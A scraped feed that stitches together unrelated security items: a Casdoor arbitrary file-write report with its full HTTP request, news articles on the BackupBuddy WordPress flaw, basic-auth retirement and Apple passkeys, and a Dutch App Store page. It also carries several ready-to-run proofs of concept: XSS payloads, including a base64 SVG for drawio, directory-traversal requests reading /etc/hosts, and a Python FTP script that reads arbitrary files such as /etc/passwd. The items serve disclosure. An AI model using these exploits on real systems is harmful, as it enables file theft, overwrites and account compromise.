Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource.

Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below：

POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider\_storage\_local\_file\_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider\_storage\_local\_file\_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor\_session\_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: \*/\*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

\------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png

I'm here.
\------WebKitFormBoundaryUPAwhIoXMrbemuJM--

Then we can find out that the problem does occur by following this link。  
https://door.casdoor.com/flag.html

CVE-2022-38638: Arbitrary file write/overwrite Vulnerability · Issue #1035 · casdoor/casdoor

The critical flaw in BackupBuddy is one of thousands of security issues reported in recent years in products that WordPress sites use to extend functionality.

Attackers are actively exploiting a critical vulnerability in BackupBuddy, a WordPress plug-in that an estimated 140,000 websites are using to back up their installations.

The vulnerability allows attackers to read and download arbitrary files from affected websites, including those containing configuration information and sensitive data such as passwords that can be used for further compromise.

WordPress security vendor Wordfence reported observing attacks targeting the flaw beginning Aug. 26, and said it has blocked close to 5 million attacks since then. The plug-in's developer, iThemes, issued a patch for the flaw on Sept. 2, more than one week after the attacks began. That raises the possibility that at least some WordPress sites using the software were compromised before a fix became available for the vulnerability.

**A Directory Traversal Bug**

In a statement on its website, iThemes described the directory traversal vulnerability as impacting websites running BackupBuddy versions 8.5.8.0 through 8.7.4.1. It urged users of the plug-in to immediately update to BackupBuddy version 8.75, even if they are not currently using a vulnerable version of the plug-in.

"This vulnerability could allow an attacker to view the contents of any file on your server that can be read by your WordPress installation," the plug-in maker warned.

iThemes' alerts provided guidance on how site operators can determine if their website has been compromised and steps they can take to restore security. These measures included resetting the database password, changing their WordPress salts, and rotating API keys and other secrets in their site-configuration file.

Wordfence said it had seen attackers using the flaw to try to retrieve "sensitive files such as the /wp-config.php and /etc/passwd file which can be used to further compromise a victim."

**WordPress Plug-in Security: An Endemic Problem**

The BackupBuddy flaw is just one of thousands of flaws that have been disclosed in WordPress environments — almost all of them involving plug-ins — in recent years.

In a report earlier this year, iThemes said it identified a total of 1,628 disclosed WordPress vulnerabilities in 2021 -- and more than 97% of them impacted plug-ins. Nearly half (47.1%) were rated as being of high to critical severity. And troublingly, 23.2% of vulnerable plug-in had no known fix.

A quick scan of the National Vulnerability Database (NVD) by Dark Reading showed that several dozen vulnerabilities impacting WordPress sites have been disclosed so far in the first week of September alone.

Vulnerable plug-ins are not the only concern for WordPress sites; malicious plug-ins are another issue. A large-scale study of over 400,000 websites that researchers at the Georgia Institute of Technology conducted uncovered a staggering 47,337 malicious plug-ins installed on 24,931 websites, most of them still active.

Sounil Yu, CISO at JupiterOne, says the risks inherent in WordPress environments are like those present in any environment that leverages plug-ins, integrations, and third-party applications to extend functionality.

"As with smartphones, such third-party components extend the capabilities of the core product, but they are also problematic for security teams because they significantly increase the attack surface of the core product," he explains, adding that vetting these products is also challenging because of their sheer number and lack of clear provenance.

"Security teams have rudimentary approaches, most often giving a cursory look at what I call the three Ps: popularity, purpose, and permissions," Yu notes. "Similar to app stores managed by Apple and Google, more vetting needs to be done by the marketplaces to ensure that malicious \[plug-ins, integrations, and third-party apps\] do not create problems for their customers," he notes.

Another problem is that while WordPress is widely used, it often is managed by marketing or Web-design professionals and not IT or security professionals, says Bud Broomhead, CEO at Viakoo.

"Installing is easy and removing is an afterthought or never done," Broomhead tells Dark Reading. "Just like the attack surface has shifted to IoT/OT/ICS, threat actors aim for systems not managed by IT, especially ones that are widely used like WordPress."

Broomhead adds, "Even with WordPress issuing alerts about plug-ins being vulnerabilities, other priorities than security may delay the removal of malicious plug-ins."

Attackers Exploit Zero-Day WordPress Plug-in Vulnerability in BackupBuddy

mbDrive Lite WiFi Flash Disk version 1.4.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: mbDrive Lite - WiFi flash disk 1.4.0 Reflected XSS# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage:https://apps.apple.com/us/developer/haw-yuan-yang/id291212805# Software Link:https://apps.apple.com/us/app/mbdrive-lite-wifi-flash-disk/id343254033# Version: 1.4.0# Tested on: iPhone ios 15.6poc:http://192.168.1.187:8080/list?path=%3Cscript%3Ealert(%271%27);%3C/script%3E

mbDrive Lite WiFi Flash Disk 1.4.0 Cross Site Scripting

AirDisk version 7.5.5 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: AirDisk 7.5.5 File Manager Stored XSS# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://apps.apple.com/us/developer/felix-yew/id505904424# Software Link:https://apps.apple.com/us/app/airdisk-file-manager/id566530748# Version: 7.5.5# Tested on: iPhone ios 15.61/ Starting the server ( File Transfer > Wi-fi File Transfer )2/ Go to browser3/ Enter the address showing on app eg: http://192.168.1.187:80804/ Create a folder with the name: rose'"><img src=xonerror=alert(document.location)>5/ Refresh.

AirDisk 7.5.5 Cross Site Scripting

@Drive version 2.8 suffers from a local file inclusion vulnerability.

    # Exploit Title: @Drive 2.8  Local File inclusion# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://evolutive.co/# Software Link: https://apps.apple.com/us/app/drive/id578982909# Version: 2.8# Tested on: iPhone ios 15.6GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.1.187User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept: */*Referer: http://192.168.1.187/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close--------HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: 213Accept-Ranges: bytesDate: Thu, 08 Sep 2022 14:26:16 GMT### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost

@Drive 2.8 Local File Inclusion

Microsoft moves ahead with a plan to sunset basic authentication, and other providers are moving — or have moved — to requiring more secure authentication as well. Is your company ready?

Microsoft and major cloud providers are starting to take steps to move their business customers toward more secure forms of authentication and the elimination of basic security weaknesses — such as using usernames and passwords over unencrypted channels to access cloud services.

Microsoft, for example, will remove the ability to use basic authentication for its Exchange Online service starting Oct. 1, requiring that its customers use token-based authentication instead. Google meanwhile has auto-enrolled 150 million people in its two-step verification process, and online cloud provider Rackspace plans to turn off cleartext email protocols by the end of the year.

The deadlines are a warning to companies that efforts to secure their access to cloud services can no longer be put off, says Pieter Arntz, malware intelligence researcher at Malwarebytes, who penned a recent blog post highlighting the coming deadline for Microsoft Exchange Online users.

"I think the balance is shifting to the point where they feel they can convince users that the extra security is in their best interest, while trying to offer solutions that are still relatively easy to use," he says. "Microsoft is often a trendsetter and announced these plans years ago, but you will still find organizations straggling and struggling to take the appropriate measures."

**Identity-Related Breaches on the Rise**

While some security-conscious companies have taken the initiative to secure access to cloud services, others have to be prodded — something that cloud providers, such as Microsoft, are increasingly willing to do, especially as companies struggle with more identity-related breaches. In 2022, 84% of companies suffered an identity-related breach, up from 79% in the previous two years, according to the Identity Defined Security Alliance's "2022 Trends in Securing Digital Identities" report.

Turning off basic forms of authentication is a simple way to block attackers, which are increasingly using credential stuffing and other mass access attempts as a first step to compromising victims. Companies with weak authentication leave themselves open to brute-force attacks, abuse of reused passwords, credentials stolen through phishing, and hijacked sessions.

And once attackers have gained access to corporate email services, they can exfiltrate sensitive information or conduct damaging attacks, such as business email compromise (BEC) and ransomware attacks, says Igal Gofman, head of research for Ermetic, a provider of identity security for cloud services.

"The use of weak authentication protocols, especially in the cloud, can be very dangerous and lead to major data leaks," he says. "Nation-states and cybercriminals are constantly abusing weak authentication protocols by executing a variety of different brute-force attacks against cloud services."

The benefits of shoring up the security of authentication can have immediate benefits. Google found that auto-enrolling people in its two-step verification process resulted in a 50% decrease in account compromises. A significant portion of companies that suffered a breach (43%) believe that having multifactor authentication could have stopped the attackers, according to the IDSA's "2022 Trends in Securing Digital Identities" report.

**Edging Toward Zero-Trust Architectures**

In addition, cloud and zero-trust initiatives have driven the pursuit of more secure identities, with more than half of companies investing in identity security as part of those initiatives, according to the IDSA's Technical Working Group, in an email to Dark Reading.

For many companies, the move away from simple authentication mechanisms that rely on merely a user's credentials has been spurred by ransomware and other threats, which have caused companies to look to minimizing their attack surface area and hardening defenses where they can, the IDSA's Technical Working Group wrote.

"As the majority of companies accelerate their zero-trust initiatives, they are also implementing stronger authentication where feasible — although, it is surprising that there are still some companies struggling with the basics, or \[that\] haven’t yet embraced zero trust, leaving them exposed," researchers there wrote.

**Obstacles to Secure Identities Remain**

Every major cloud provider offers multifactor authentication over secure channels and using secure tokens, such as OAuth 2.0. While turning on the feature may be simple, managing secure access can lead to an increase in work for the IT department — something for which businesses need to be ready, says Malwarebytes' Arntz.

Companies "sometimes fail when it comes to managing who has access to the service and which permissions they require," he says. "It is the extra amount of work for IT staff that comes with a higher authentication level — that is the bottleneck."

Researchers at the IDSA's Technical Working Group explained that legacy infrastructure is also a hurdle.  

"While Microsoft has been in the process of moving their authentication protocols forward for some time, the challenge of migrating and backward compatibility for legacy apps, protocols, and devices has delayed their adoption," they noted. "It's good news that the end is in sight for basic auth."

Consumer-focused services are also slow to adopt more secure approaches to authentication. While Google's move has improved security for many consumers, and Apple has enabled two-factor authentication for more than 95% of its users, for the most part consumers continue to only use multifactor authentication for a few services.

While almost two-thirds of companies (64%) have identified initiatives to secure digital identities as one of their top three priorities in 2022, only 12% of organizations have implemented multifactor authentication for their users, according to the IDSA's report. However, firms are looking to provide the option, with 29% of consumer-focused cloud providers currently implementing better authentication and 21% planning on it for the future.

Microsoft, Cloud Providers Move to Ban Basic Authentication

Cross-site Scripting (XSS) - Generic in GitHub repository jgraph/drawio prior to 20.3.0.

**Description**

The application allows the "use" tag to pass on dompurify, which leads to XSS. A strange behaviour bypasses the csp on app.diagrams.net when it has a "?" before the "#U" import.

**Proof of Concept**

POC diagram:

    <?xml version="1.0" encoding="UTF-8"?>
    <mxfile host="app.diagrams.netxyz" modified="2022-09-06T18:54:56.458Z" agent="5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" etag="xY3UKbpTp-KH--H4WcwT" version="20.2.8">
      <diagram id="4FUsL0c-RG27eG5O0xMg" name="Page-1">
        <mxGraphModel dx="1422" dy="664" grid="1" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="827" pageHeight="1169" math="0" shadow="0">
          <root>
            <mxCell id="0" />
            <mxCell id="1" parent="0" />
            <mxCell id="L7LsTOqxvLqq3sj4AYtF-1xyz" value="Text&lt;svg>&lt;use href=&#x22;data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoZG9jdW1lbnQuZG9tYWluKSIgLz4KPC9zdmc+#x&#x22; />&lt;/svg>" style="text;html=1;strokeColor=none;fillColor=none;align=center;verticalAlign=middle;whiteSpace=wrap;rounded=0;" vertex="1" parent="1">
              <mxGeometry x="430" y="260" width="60" height="30" as="geometry" />
            </mxCell>
          </root>
        </mxGraphModel>
      </diagram>
    </mxfile>
    

Raw payload:

    <svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoZG9jdW1lbnQuZG9tYWluKSIgLz4KPC9zdmc+#x" /></svg>
    

POC link

    https://app.diagrams.net/?#Uhttps://webhook.site/d38b94cb-a6ab-4219-b9f3-d34434b76341
    https://viewer.diagrams.net/index.html?#Uhttps://webhook.site/d38b94cb-a6ab-4219-b9f3-d34434b76341
    

**Impact**

XSS

**References**

*   https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#data-url-with-use-element-and-base64-encoded

CVE-2022-3148: XSS at app.diagrams.net in drawio

With iOS 16 and macOS Ventura, Apple is introducing passkeys—a more convenient and secure alternative to passwords.

For years, we’ve been promised the end of password-based logins. Now the reality of a passwordless future is taking a big leap forward, with the ability to ditch passwords being rolled out for millions of people. When Apple launches iOS 16 on September 12 and macOS Ventura next month, the software will include its password replacement, known as passkeys, for iPhones, iPads, and Macs.

Passkeys allow you to log in to apps and websites, or create new accounts, without having to create, memorize, or store a password. This passkey, which is made up of a cryptographic key pair, replaces your traditional password and is synced across iCloud’s Keychain. It has the potential to eliminate passwords and improve your online security, replacing the insecure passwords and bad habits you probably have now.

Apple’s rollout of passkeys is one of the largest implementations of password-free technology to date and builds on years of work by the FIDO Alliance, an industry group made up of tech’s biggest companies. Apple’s passkeys are its version of the standards created by the FIDO Alliance, meaning they will eventually work with Google, Microsoft, Meta, and Amazon’s systems.

What Is a Passkey?

Using a passkey is similar to using a password. On Apple’s devices, it’s built into the traditional password boxes that websites and apps use to get you to log in. Passkeys act as a unique digital key and can be created for each app or website you use. (The word “passkey” is also being used by Google and Microsoft, with FIDO calling them “multi-device FIDO credentials.”)

If you are new to an app or a website, there’s the potential that you can create a passkey instead of a password from the start. But for services where you already have an account, it’s likely you will need to log in to that existing account using your password and then create a passkey.

Apple’s demonstrations of the technology show a prompt appearing on your devices during the sign-in or account-creation phase. This box will ask whether you would like to “save a passkey” for the account you are using. At this stage, your device will prompt you to use Face ID, Touch ID, or another authentication method to create the passkey.

Once created, the passkey can be stored in iCloud’s Keychain and synced across multiple devices—meaning your passkeys will be available on your iPad and MacBook without any extra work. Passkeys work in Apple’s Safari web browser as well as on its devices. They can also be shared with nearby Apple devices using AirDrop.

As Apple’s passkeys are based on the wider passwordless standards created by the FIDO Alliance, there’s the potential that they can be stored elsewhere, too. For instance, password manager Dashlane has already announced its support for passkeys, claiming it is an “independent and universal solution agnostic of the device or platform.”

While Apple is launching passkeys with iOS 16 and macOS Ventura, there are several caveats to its rollout. First, you need to update your devices to the new operating system. Second is that apps and websites need to support the use of passkeys—they can do this by using the FIDO standards. Ahead of Apple’s updates, it isn’t clear which apps or websites are already supporting passkeys, although Apple first previewed the technology to developers at its developer conference in 2021.

How Do Apple’s Passkeys Work?

Under the hood, Apple’s passkeys are based on the Web Authentication API (WebAuthn), which was developed by the FIDO Alliance and World Wide Web Consortium (WC3). The passkeys themselves use public key cryptography to protect your accounts. As a result, a passkey isn’t something that can (easily) be typed.

When you create a passkey, a pair of related digital keys are created by your system. “These keys are generated by your devices, securely and uniquely, for every account,” Garrett Davidson, an engineer on Apple’s authentication experience team, said in a video about passkeys. One of these keys is public and stored on Apple’s servers, while the other key is a secret key and stays on your device at all times. “The server never learns what your private key is, and your devices keep it safe,” Davidson said.

Apple’s Killing the Password. Here’s Everything You Need to Know

WeDayCare B.V Ouderapp before v1.1.22 allows attackers to alter the ID value within intercepted calls to gain access to data of other parents and children.

Met de ‘Eigen & Wijzer ouderapp’ kijkt u mee met de belevenissen van uw kind(eren) bij Eigen&Wijzer Kinderopvang. U kunt foto’s bekijken, berichten van de groep en de locatie lezen en versturen en de ontwikkelingen van uw kind(eren) volgen. Het is via de app mogelijk om opvangdagen aan te vragen, te ruilen en de afwezigheid door te geven. U kunt tevens de facturen, jaaropgaven en andere documenten inzien.

Om gebruik te maken van deze App moet je kinderdagverblijf organisatie aangesloten zijn bij Wedaycare.com.

**Nieuw**

Met de WeDayCare App staan ouders direct in contact met het kinderdagverblijf. Blijf dagelijks op de hoogte van alle leuke momenten tijdens de dag op de opvang. Met de app kun je foto’s bekijken, dagelijks schriftje inzien en berichten sturen met de medewerkers van de groep. Daarnaast kun je ook extra opvang of ruildagen aanvragen en afwezigheid doorgeven.

Om gebruik te maken van deze App moet je kinderdagverblijf organisatie aangesloten zijn bij Wedaycare.com.

**Beoordelingen en recensies**

2,8 van 5

9 beoordelingen

**Prima app, kleine bug**

> Prima handige app. Snel communicatie met opvang, vrije dagen aanvraag etc werkt goed. Alleen bij reactie dat er nieuwe invoer in het dagboek is moet je 2x het dagboek openen voordat het bericht geladen wordt

**Verschrikkelijk app**

> Kan geen eens foto download en heb een iPhone 13 pro Max. Niet in de berichten of in het fotoalbum. Dat is het enige waarom ik de app heb. Zou 0 sterren geven als dat kon.

> Beste Nore,
> 
> Waarschijnlijk heb je geen toestemming gegeven dat de app foto's kan downloaden op je telefoon. Zou je anders de app willen verwijderen en opnieuw willen installeren? Hierna krijg je de vraag zodra je de eerste foto download om toestemming te geven voor het downloaden van foto's. We horen graag of het gelukt is. Zou je ons willen mailen op support@wedaycare.com. Bedankt

**Werkt super!**

> Erg fijn om zo op de hoogte gehouden te worden. App werkt goed!

> Fijn om te horen. Mocht je nog suggesties hebben horen wij het graag via support@wedaycare.com

**App-privacy**

De ontwikkelaar, Wedaycare B.V., heeft aangegeven dat volgens de toepassing van het privacybeleid van de app gegevens kunnen worden beheerd zoals hieronder staat beschreven. Ga voor meer informatie naar het privacybeleid van de ontwikkelaar.

**Er worden geen gegevens verzameld**

De ontwikkelaar verzamelt geen gegevens van deze app.

Toepassing van het privacybeleid kan variëren op basis van bijvoorbeeld de functies die je gebruikt of je leeftijd. Lees meer

**Informatie**

Provider

Wedaycare B.V.

Grootte

34,5 MB

Categorie

Onderwijs

Compatibiliteit

iPhone

Vereist iOS 12.0 of nieuwer.

iPad

Vereist iPadOS 12.0 of nieuwer.

iPod touch

Vereist iOS 12.0 of nieuwer.

Mac

Vereist een Mac met macOS 11.0 of nieuwer én Apple M1-chip of nieuwer.

Leeftijd

4+

Copyright

© WeDayCare

Prijs

Gratis

*   App-support
*   Privacybeleid

*   App-support
*   Privacybeleid

**Meer van deze ontwikkelaar**

**Suggesties voor jou**

CVE-2022-36539: ‎Eigen&Wijzer Ouderapp

FE File Explorer version 11.0.4 suffers from a local file inclusion vulnerability.

    # Exploit Title: FE File Explorer 11.0.4 Local File inclusion# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/fe-file-explorer-file-manager/id510282524# Version: 11.0.4# Tested on: iPhone ios 15.6from ftplib import FTPimport argparsehelp = " FE File Explorer Local File inclusion"parser = argparse.ArgumentParser(description=help)parser.add_argument("--target", help="Target IP", required=True)parser.add_argument("--file", help="File To Open eg: etc/passwd")args = parser.parse_args()ip = args.targetport = 2121 # Default Portfiles = args.fileftpConnection = FTP()ftpConnection.connect(host=ip, port=port)ftpConnection.login();def downloadFile():ftpConnection.cwd('/../../../../../../../../../../../../../../../../')        ftpConnection.retrbinary(f"RETR {files}", open('data.txt','wb').write)        ftpConnection.close()        file = open('data.txt', 'r')        print (f"[***] The contents of {files}\n")        print (file.read())downloadFile()

Tag

#apple